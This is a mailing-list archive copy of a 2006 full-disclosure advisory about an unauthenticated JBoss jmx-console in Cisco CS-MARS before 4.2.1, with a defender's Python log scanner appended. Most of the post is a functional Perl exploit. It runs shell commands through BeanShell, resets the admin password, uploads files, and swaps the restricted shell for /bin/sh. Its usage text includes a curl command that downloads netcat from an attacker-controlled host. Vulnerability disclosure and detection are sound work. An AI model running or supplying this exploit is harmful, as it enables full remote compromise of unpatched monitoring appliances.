ARCHIVE :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] Cisco/Protego CS-MARS < 4.2.1 remote command execution via insecure JBoss installation exploit



> ------------------------------
> 
> Message: 7
> Date: Wed, 19 Jul 2006 09:17:09 -0700
> From: Jon Hart <jhart@xxxxxxxxxxx>
> Subject: [Full-disclosure] Cisco MARS < 4.2.1 remote compromise
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <20060719161709.GF25856@xxxxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
> 
> Cisco MARS (Monitoring, Analysis and Response System, sometimes referred
> to as CS-MARS) prior to version 4.2.1 ships with an unprotected JBoss
> installation which ultimately leads to a complete compromise of the
> device.
> 
> The caveat here is that, despite much work on Cisco's part, they were
> not able to determine why some CS-MARS boxes were vulnerable and others
> were not.  In versions 4.2.1 and newer, the discovered vulnerabilities
> have been fixed.
> 
> Vulnerability #1
> ----------------
> 
> CS-MARS shipped with JBoss 3.2.7, which suffered a number of flaws
> originally disclosed by Marc Schoenefeld in June of 2005.  See
> http://www.securityfocus.com/archive/1/402653 for the original posting.
> 
> Vulnerability #2
> ----------------
> 
> CS-MARS' JBoss installation is basically stock, so few if any of the
> recommended procedures were taken to secure it prior to shipment.
> A common document used in securing JBoss can be found at
> http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss
> 
> Perhaps the most glaring vulnerability that results is the exposure of
> the jmx-console, and in turn full access to all of the MBeans.  Per
> JBoss.org's description of the jmx-console:
> 
>    "The JMX console provides a raw view into the microkernel of the
>    JBoss application server. It lists all registered services (MBeans)
>    that are active in the application server and that can be accessed
>    either through the JMX console itself or programmatically from Java
>    code."
> 
> As you can imagine, once an attacker has access to the jmx-console, the
> thoroughness with which the box can be compromised is only limited by
> their imagination.  The jmx console is reachable on CS-MARS devices
> versions < 4.2.1 -- no authentication is necessary, and is available on
> port 80 and 443.
> 
> I've put together some functional POC exploit code that leverages many
> of the MBeans to compromise the system in various ways.  Please see the
> attached code.
> 
> 
> Vendor status
> -------------
> 
> Cisco's PSIRT was extremely responsive throughout this entire process.
> The JBoss issues I mentioned above are addressed by Cisco DDTS
> CSCse47646, and fixed in version 4.2.1 and newer.
> 
> 
> Enjoy,
> 
> -jon
> 
> -------------- next part --------------
> #!/usr/bin/perl
> # 
> # Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise
> # via insecure JBoss installation.
> #
> # Fully functional POC code by Jon Hart <jhart@xxxxxxxxxxx>
> #
> # Addressed in CSCse47646
> #
> # CS-MARS is an event correlation product originally written by Protego,
> # which is now owned by Cisco.  It is built on top of JBoss.
> # Unfortunately, little or no effort was put in to securing the JBoss
> # installation as per the JBoss community's recommended best practices.
> # As such, the usual set of JBoss interfaces are wide open and it is up to
> # the attacker how creative they want to be in compromising the box.  This
> # particular exploit vector abuses the JBoss jmx-console for all sorts of
> # fun.  It should also be noted that, because of the very old kernel
> # running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is
> # almost trivial.  Thanks to Cisco PSIRT and Matt Cerha for their
> # cooperation in getting this fixed.
> #
> #################################
> #  Copyright (C) 2006 Jon Hart
> #
> #  This program is free software; you can redistribute it and/or modify it
> #  under the terms of the GNU General Public License as published by the Free
> #  Software Foundation; either version 2 of the License, or (at your option)
> #  any later version.
> #
> #  This program is distributed in the hope that it will be useful, but WITHOUT
> #  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
> #  FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
> #  more details.
> #
> #  You should have received a copy of the GNU General Public License along with
> #  this program; if not, write to the Free Software Foundation, Inc., 59 Temple
> #  Place, Suite 330, Boston, MA 02111-1307 USA
> #
> #
> #################################
> #
> 
> use strict;
> use HTTP::Request::Common;
> use LWP::UserAgent;
> use IO::Socket;
> 
> my $target = shift(@ARGV) || &usage;
> my $attack_type = shift(@ARGV) || &usage; 
> 
> for ($attack_type) {
>    if    (/pass/) { &change_passwd(@ARGV); }
>    elsif (/cmd/) { &run_cmd(@ARGV); }
>    elsif (/upload/) { &upload(@ARGV); }
>    elsif (/[bean|bsh]/) { &run_bsh(@ARGV); }
>    else { &usage; }
> } 
> 
> sub change_passwd {
>    my $passwd = shift;
>    &run_cmd("/opt/janus/release/bin/pnpasswd $passwd");
> }
> 
> sub encode {
>    my $en = shift;
>    my $string = "";
>    foreach my $char (split(//, $en)) {
>       if ($char =~ /([:|\/|(|)|"|'|`| ])/) {
>          $string .= sprintf("%%%x", ord($1));
>       } else { $string .= $char; }
>    }
>    return $string;
> }
> 
> sub jmx_post {
>    my $form_data = shift; 
>    my $ua = LWP::UserAgent->new;
>    $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
>    my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor");
>    $req->content_type('application/x-www-form-urlencoded');
>    $req->content(&encode($form_data));
> 
>    my $res = $ua->request($req);
> 
>    return $res->is_success ? 0 : $res->status_line;
> }
> 
> sub run_bsh {
>    my $file = shift;
>    my $bsh = "";
>    open(BSH, "$file") or die "Couldn't open $file: $!\n";
>    print("Sending beanshell from $file: ");
>    while (<BSH>) {
>       # the bsh must be one long string...
>       chomp();
>       $bsh .= $_;
>    }
>    
>    printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed");
> }
> 
> sub run_cmd {
>    my $cmd = shift; 
>    my $code = "";
>   
>    # & in the command needs to be encoded so as to not be confused with the &
>    # in the URI
>    $cmd =~ s/&/%26/g;
>    if ($cmd =~ />|\||&/) {
>       # exec() does not handle pipes or redirection well, so do this instead
>       $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "'
>             . $cmd .
>             '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);';
>    } else {
>       $code = "Runtime.getRuntime().exec(\"$cmd\");";
>    }
> 
>    print("Running '$cmd' on $target: ");
>    printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!");
> }
> 
> sub send_beanshell {
>    my $code = shift;
>    # ensure the name of the bsh job within java has a unique name
>    my $name = "cmd" . int(rand(65535)) . $$;
>    return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name");
> }
> 
> sub upload {
>    # upload a file.  I was too lazy to use org.jboss.console.manager.DeploymentFileRepository
>    my $file = shift;
>    my $path = shift;
>    my $new_name = shift;
>    my $chunk = "";
>    my $ret = 0;
>    open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n";
> 
>    if (!(defined($new_name))) {
>       my @path = split(/\//, $file);
>       $new_name = $path[$#path];
>    }
> 
>    print("Uploading $file to $target...\n");
>    &run_cmd("touch $path/$new_name");
>    while(read(FILE,$chunk,4096)) {
>       # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss.
>       # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss
>       # throw a 500 or otherwise botch the file.  UGLY.
>       $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk));
>       $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name");
>    }
> 
>    printf("Upload of $file to $target:$path/new_name %s!\n", $ret == 0 ? "succeeded" : "failed");
> }
> 
> 
> sub usage {
>    print <<EOF;
>    Cisco MARS (CS-MARS) < 4.2.1 JBoss exploit (CSCse47646) POC by Jon Hart <jhart\@spoofed.org>
> 
>    Basic Usage:
>       $0 <target> <exploit_type> [<exploit_specific_args] ...]
> 
>    Extended Usage:
>       Change password:
>       $0 <target> pass <password>
>       Run shell command:
>       $0 <target> cmd <your quoted shell command>
>       Run BeanShell code:
>       $0 <target> bsh /path/to/file/with/beanshell
>       Upload files:
>       $0 <target> upload <file to upload> <path on target> [<new name>]
> 
>       Fun Stuff:
>          Get a real shell:
>          $0 <target> cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak"
>          $0 <target> cmd "rm  /opt/janus/release/bin/pnsh"
>          $0 <target> cmd "cp /bin/sh /opt/janus/release/bin/pnsh"
>          # now ssh to the target...
>          [pnadmin\@pnmars bin]\$ id
>          uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin)
>          [pnadmin\@pnmars bin]\$ uname -a
>          Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown
>          [pnadmin\@pnmars bin]\$ hostname
>          pnmars
>          
>          Download something:
>          $0 <target> cmd "curl http://yourhost/nc -o /tmp/nc"
> 
> EOF
> exit(1);
> }
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 189 bytes
> Desc: Digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060719/6a267bb9/attachment-0001.bin
> 
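A defender-side check for the exposure described in the post above, added here as an example (it is not part of Jon Hart's message or of the CS-MARS product): it scans web-server access-log lines for requests to the JBoss jmx-console, treats a 401/403 answer as the sign of a console that was secured per the JBoss recommendations, and ranks successful hits to HtmlAdaptor (the endpoint the POC posts invokeOp calls to) highest. The sample log lines are constructed; the combined log format and the reading of a `-` user field as "no HTTP auth" are assumptions.

```python
import re

# Combined log format (httpd style): ip ident user [time] "METHOD PATH PROTO" status bytes (assumed layout)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines, not real CS-MARS traffic (RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jul/2006:09:17:09 -0700] "GET /jmx-console/ HTTP/1.1" 200 4512
203.0.113.5 - - [19/Jul/2006:09:17:12 -0700] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 213
192.0.2.10 - admin [19/Jul/2006:09:20:01 -0700] "GET /jmx-console/HtmlAdaptor?action=inspectMBean HTTP/1.1" 200 9870
198.51.100.7 - - [19/Jul/2006:09:21:30 -0700] "GET /jmx-console/ HTTP/1.1" 401 0
198.51.100.7 - - [19/Jul/2006:09:22:00 -0700] "GET /index.html HTTP/1.1" 200 1024
"""

def classify(entry):
    """Return a finding string for one parsed log entry, or None if it is benign."""
    path = entry["path"].split("?", 1)[0]
    query = entry["path"].partition("?")[2]
    if not path.startswith("/jmx-console"):
        return None
    status = int(entry["status"])
    if status in (401, 403):
        return None  # the console challenged for credentials: protected as recommended
    if status // 100 != 2:
        return None
    unauth = entry["user"] == "-"  # assumption: '-' means no HTTP auth took place
    # invokeOp via HtmlAdaptor (POST body or GET query) is how MBean operations get called
    if path == "/jmx-console/HtmlAdaptor" and (entry["method"] == "POST" or "invokeOp" in query):
        return "critical: MBean operation invoked via HtmlAdaptor" + (" without HTTP auth" if unauth else "")
    if unauth:
        return "high: jmx-console served to unauthenticated client"
    return "info: authenticated jmx-console access"

def scan(log_text):
    """Parse every line, keep the ones that warrant attention, return (ip, method, path, verdict)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        verdict = classify(entry)
        if verdict:
            findings.append((entry["ip"], entry["method"], entry["path"], verdict))
    return findings
```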




 




Copyright © Lexa Software, 1996-2009.